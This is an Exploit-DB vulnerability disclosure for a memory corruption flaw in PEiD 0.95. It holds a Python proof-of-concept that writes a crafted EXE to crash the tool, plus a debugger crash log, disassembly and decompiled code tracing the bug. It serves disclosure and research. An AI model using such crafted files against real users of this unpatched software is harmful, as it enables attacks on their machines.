PEiD 0.95 – Memory Corruption (PoC)

  • 作者: Debasish Mandal
    日期: 2013-06-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/26413/
  • # Title: PEiD v0.95 Memory Corruption
    # About PEiD :PEiD is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files. Very popular among malware researchers for detection of packers / cryptors.
    # Date: 22nd June 2013
    # Author: Debasish Mandal ( https://twitter.com/debasishm89 )
    # Blog : http://www.debasish.in/
    # Version: PEiD version 0.95
    # Download Link : http://www.softpedia.com/progChangelog/PEiD-updated-Changelog-4102.html
    # Tested on: Windows XP SP2 / Windows 7
    # Vendor Patch : Unpatched. This software is not under active development. Last stable version released on November 6th, 2008.
    # Threat mitigation : Exploitation of this issue requires the user to explicitly open a specially crafted EXE file. So the PEiD user should refrain from opening files from untrusted third parties or accessing untrusted remote sites.
    
    # POC
    
    # c:\python27
    junk = "\x41"
    header = "MZ"
    header += junk * 58
    header += "\x80"
    header += "\x00" * 3
    header += junk * 64
    header += "PE"
    header += "\x00"*2
    header += junk * 3
    header += "\x00"
    header += junk * 12
    header += "\xe0\x00"
    header += junk * 2
    header += "\x0b\x01"
    header += junk * 16
    header += "\x00" * 2
    header += junk * 338
    header += "\x00" * 2
    header += junk * 5
    header += "\x00" * 3
    header += junk * 2427
    header += "\xa9"
    header += junk * 7
    header += "\x90"
    header += junk * 3	
    header += "\x90"
    header += junk * 40
    f = open('peid_poc.exe','wb')
    f.write(header)
    f.close()
    '''
    Above python code will generate a crafted EXE. This EXE can be used as POC to trigger the Crash of PEiD version 0.95.
    
    (9fc.c2c): Access violation - code c0000005 (!!! second chance !!!)
    eax=00000000 ebx=6fbeca5e ecx=00d4fae0 edx=00000019 esi=00000000 edi=91164141
    eip=0043d4d1 esp=00d4faac ebp=00d4fee8 iopl=0 nv up ei ng nz na pe nc
    cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00000286
    *** WARNING: Unable to verify checksum for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe
    *** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe
    PEiD+0x3d4d1:
    0043d4d1 8a0c07mov cl,byte ptr [edi+eax]ds:0023:91164141=??
    
    PEiD Crashes at With Read AV @ 0043d4d1. EDI Register is pointing to ring0 : edi=91164141.
    
    Stack Trace:
    
    0:001> kb
    ChildEBP RetAddrArgs to Child
    WARNING: Stack unwind information not available. Following frames may be wrong.
    00d4fee8 78b8c3c0 64123456 0000058f c4830000 PEiD+0x3d4d1
    00d4ff04 0045d1e6 0040867c 00d4ff7c 00000000 0x78b8c3c0
    00d4ff40 00455b97 0040867c 00d4ff7c 00000000 PEiD+0x5d1e6
    00d4ffb4 7c80b50b 0048650c 001520a8 0012f4bc PEiD+0x55b97
    00d4ffe0 7c80b517 00000000 00000000 00000000 kernel32!BaseThreadStart+0x37
    00d4ffe4 00000000 00000000 00000000 00455a50 kernel32!BaseThreadStart+0x43
    
    Stack Dump:
    
    0:001> d esp
    00d4faac41 41 41 90 7c ff d4 00-40 ff d4 00 77 ca be 6fAAA.|...@...w..o
    00d4fabce0 fa d4 00 37 4c 44 00-41 41 16 91 77 ca be 6f....7LD.AA..w..o
    00d4faccdc fa d4 00 20 01 00 00-18 00 00 00 7c 86 40 00.... .......|.@.
    00d4fadc90 41 91 7c e8 fe d4 00-19 00 00 00 08 00 00 00.A.|............
    00d4faec1a 00 00 00 1a 00 00 00-1a 00 00 00 05 00 00 00................
    00d4fafc0c 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00................
    00d4fb0c1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00................
    00d4fb1c1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00................
    
    00DFFAAC 90414141 <- ESP
    00DFFAB0 00DFFF7C
    00DFFAB4 00DFFF40
    00DFFAB8 6FBECA77
    00DFFABC 00DFFAE0
    00DFFAC0 00444C37RETURN to PEiD.00444C37 from PEiD.0043D4A0
    00DFFAC4 91084141
    00DFFAC8 6FBECA77
    00DFFACC 00DFFADC
    00DFFAD0 00000120
    00DFFAD4 00000018
    00DFFAD8 0040867CPEiD.0040867C
    00DFFADC 7C914190RETURN to ntdll.7C914190 from ntdll.7C910387
    
    Disassembly of the function where program crashed. Function : PEiD.0043D4A0 (I've named it as "crash_function")
    
    0043D4A0 51 PUSH ECX
    0043D4A1 8B51 04MOV EDX,DWORD PTR DS:[ECX+4]
    0043D4A4 8B4424 0CMOV EAX,DWORD PTR SS:[ESP+C]
    0043D4A8 3BC2 CMP EAX,EDX
    0043D4AA 890C24 MOV DWORD PTR SS:[ESP],ECX
    0043D4AD 7D 06JGE SHORT PEiD.0043D4B5
    0043D4AF 32C0 XOR AL,AL
    0043D4B1 59 POP ECX
    0043D4B2 C2 0C00RETN 0C
    0043D4B5 53 PUSH EBX
    0043D4B6 55 PUSH EBP
    0043D4B7 8BD8 MOV EBX,EAX
    0043D4B9 56 PUSH ESI
    0043D4BA 2BDA SUB EBX,EDX
    0043D4BC 33F6 XOR ESI,ESI
    0043D4BE 57 PUSH EDI
    0043D4BF 8B7C24 18MOV EDI,DWORD PTR SS:[ESP+18]
    0043D4C3 85DB TEST EBX,EBX
    0043D4C5 7E 34JLE SHORT PEiD.0043D4FB
    0043D4C7 33C0 XOR EAX,EAX
    0043D4C9 85D2 TEST EDX,EDX
    0043D4CB 7E 42JLE SHORT PEiD.0043D50F
    0043D4CD 8B29 MOV EBP,DWORD PTR DS:[ECX]
    0043D4CF 03FE ADD EDI,ESI
    0043D4D1 8A0C07 MOV CL,BYTE PTR DS:[EDI+EAX] <- Code crashes here
    0043D4D4 3A0C28 CMP CL,BYTE PTR DS:[EAX+EBP]
    0043D4D7 75 07JNZ SHORT PEiD.0043D4E0
    0043D4D9 40 INC EAX
    0043D4DA 3BC2 CMP EAX,EDX
    
    Setting a BP @ Entry 0x0043D4A0 of this function we can see the value of EDI register is already corrupted before entering into this function. 
    To find out the cross reference which means other function calling above function we used IDA Pro. 
    IDA Pro Shows us that this function is getting called multiple times:
    
    Direction Type AddressText
    --------- ---- -----------
    Downpsub_43DF00+E1callcrash_function
    Downpsub_43F260+1E9 callcrash_function
    Downpsub_43F260+230 callcrash_function
    Downpsub_43F260+312 callcrash_function
    Downpsub_43F260+346 callcrash_function
    Downpsub_43F260+382 callcrash_function
    Downpsub_43F260+3A9 callcrash_function
    Downpvuln_func+162callcrash_function
    Downpsub_446020+1A5 callcrash_function
    Downpsub_446020+1C7 callcrash_function
    Downpsub_446020+20F callcrash_function
    Downpsub_446020+22D callcrash_function
    Downpsub_446020+271 callcrash_function
    Downpsub_446020+28F callcrash_function
    Downpsub_446020+2D6 callcrash_function
    Downpsub_446020+2F8 callcrash_function
    Downpsub_446020+339 callcrash_function
    Downpsub_446020+357 callcrash_function
    
    After Analyzing the code It was found found that below function is actually calling the PEiD.0043D4A0 function which triggers the crash: 
    This is the actual vulnerable function which causes the corruption.
    
    00444AD0 81EC 2C040000SUB ESP,42C
    00444AD6 A1 D4A54000MOV EAX,DWORD PTR DS:[40A5D4]
    00444ADB 33C4 XOR EAX,ESP
    00444ADD 898424 28040000MOV DWORD PTR SS:[ESP+428],EAX
    00444AE4 33C9 XOR ECX,ECX
    00444AE6 56 PUSH ESI
    00444AE7 8BB424 38040000MOV ESI,DWORD PTR SS:[ESP+438]
    00444AEE 8B46 0CMOV EAX,DWORD PTR DS:[ESI+C]
    00444AF1 C68424 10040000 >MOV BYTE PTR SS:[ESP+410],89
    00444AF9 C68424 11040000 >MOV BYTE PTR SS:[ESP+411],4A
    00444B01 C68424 12040000 >MOV BYTE PTR SS:[ESP+412],0FC
    00444B09 C68424 13040000 >MOV BYTE PTR SS:[ESP+413],33
    00444B11 C68424 14040000 >MOV BYTE PTR SS:[ESP+414],0C0
    00444B19 C68424 15040000 >MOV BYTE PTR SS:[ESP+415],0C3
    00444B21 C68424 16040000 >MOV BYTE PTR SS:[ESP+416],0B8
    00444B29 C68424 17040000 >MOV BYTE PTR SS:[ESP+417],78
    00444B31 C68424 18040000 >MOV BYTE PTR SS:[ESP+418],56
    00444B39 C68424 19040000 >MOV BYTE PTR SS:[ESP+419],34
    00444B41 C68424 1A040000 >MOV BYTE PTR SS:[ESP+41A],12
    00444B49 C68424 1B040000 >MOV BYTE PTR SS:[ESP+41B],64
    00444B51 C68424 1C040000 >MOV BYTE PTR SS:[ESP+41C],8F
    00444B59 C68424 1D040000 >MOV BYTE PTR SS:[ESP+41D],5
    00444B61 888C24 1E040000MOV BYTE PTR SS:[ESP+41E],CL
    00444B68 888C24 1F040000MOV BYTE PTR SS:[ESP+41F],CL
    00444B6F 888C24 20040000MOV BYTE PTR SS:[ESP+420],CL
    00444B76 888C24 21040000MOV BYTE PTR SS:[ESP+421],CL
    00444B7D C68424 22040000 >MOV BYTE PTR SS:[ESP+422],83
    00444B85 C68424 23040000 >MOV BYTE PTR SS:[ESP+423],0C4
    00444B8D C68424 24040000 >MOV BYTE PTR SS:[ESP+424],4
    00444B95 C68424 25040000 >MOV BYTE PTR SS:[ESP+425],55
    00444B9D C68424 26040000 >MOV BYTE PTR SS:[ESP+426],53
    00444BA5 C68424 27040000 >MOV BYTE PTR SS:[ESP+427],51
    00444BAD C68424 28040000 >MOV BYTE PTR SS:[ESP+428],57
    00444BB5 0FB740 06MOVZX EAX,WORD PTR DS:[EAX+6]
    00444BB9 83F8 02CMP EAX,2
    00444BBC 73 18JNB SHORT PEiD.00444BD6
    00444BBE 32C0 XOR AL,AL
    00444BC0 5E POP ESI
    00444BC1 8B8C24 28040000MOV ECX,DWORD PTR SS:[ESP+428]
    00444BC8 33CC XOR ECX,ESP
    00444BCA E8 A88F0200CALL PEiD.0046DB77
    00444BCF 81C4 2C040000ADD ESP,42C
    00444BD5 C3 RETN
    00444BD6 53 PUSH EBX
    00444BD7 57 PUSH EDI
    00444BD8 8B7E 18MOV EDI,DWORD PTR DS:[ESI+18]
    00444BDB 8D1480 LEA EDX,DWORD PTR DS:[EAX+EAX*4]
    00444BDE 8B7CD7 ECMOV EDI,DWORD PTR DS:[EDI+EDX*8-14] 
    00444BE2 51 PUSH ECX
    00444BE3 48 DEC EAX
    00444BE4 50 PUSH EAX
    00444BE5 8BCE MOV ECX,ESI
    00444BE7 E8 748A0100CALL PEiD.0045D660
    00444BEC 8BD8 MOV EBX,EAX
    00444BEE 8D043B LEA EAX,DWORD PTR DS:[EBX+EDI]
    00444BF1 3B46 04CMP EAX,DWORD PTR DS:[ESI+4]
    00444BF4 76 1AJBE SHORT PEiD.00444C10
    00444BF6 5F POP EDI
    00444BF7 5B POP EBX
    00444BF8 32C0 XOR AL,AL
    00444BFA 5E POP ESI
    00444BFB 8B8C24 28040000MOV ECX,DWORD PTR SS:[ESP+428]
    00444C02 33CC XOR ECX,ESP
    00444C04 E8 6E8F0200CALL PEiD.0046DB77
    00444C09 81C4 2C040000ADD ESP,42C
    00444C0F C3 RETN
    00444C10 6A 19PUSH 19
    00444C12 8D8C24 1C040000LEA ECX,DWORD PTR SS:[ESP+41C]
    00444C19 51 PUSH ECX
    00444C1A 8D4C24 18LEA ECX,DWORD PTR SS:[ESP+18]
    00444C1E E8 1D87FFFFCALL PEiD.0043D340
    00444C23 8B06 MOV EAX,DWORD PTR DS:[ESI]
    00444C25 8D5424 0CLEA EDX,DWORD PTR SS:[ESP+C]
    00444C29 52 PUSH EDX
    00444C2A 53 PUSH EBX
    00444C2B 03C7 ADD EAX,EDI
    00444C2D 50 PUSH EAX
    00444C2E 8D4C24 1CLEA ECX,DWORD PTR SS:[ESP+1C]
    00444C32 E8 6988FFFFCALL PEiD.0043D4A0<- CAll to the crash function
    
    Equivalent C Code:
    
    char vuln_func(int a1, int a2)
    {
    int v6;
    v3 = (a2 + 12);
    v9 = -119;
    v10 = 74;
    v11 = -4;
    // Declaration of few more local variables. Ommited
    v2 = (v3 + 6);
    if ( v2 >= 2 )
    {
    v6 = ((a2 + 24) + 40 * v2 - 20); // <<---
    v5 = before_crash1(a2, v2 - 1, 0); 
    if ((v5 + v6) <= (a2 + 4) )
    {
    before_crash2(&v9, 25);
    result = crash_function((int)&v8, v6 + a2, v5, (int)&v7);	//Vulnerable function calling the crash_function. Inside this peid prog. will crash
    }
    else
    {
    result = 0;
    }
    }
    else
    {
    result = 0;
    }
    return result;
    }
    
    '''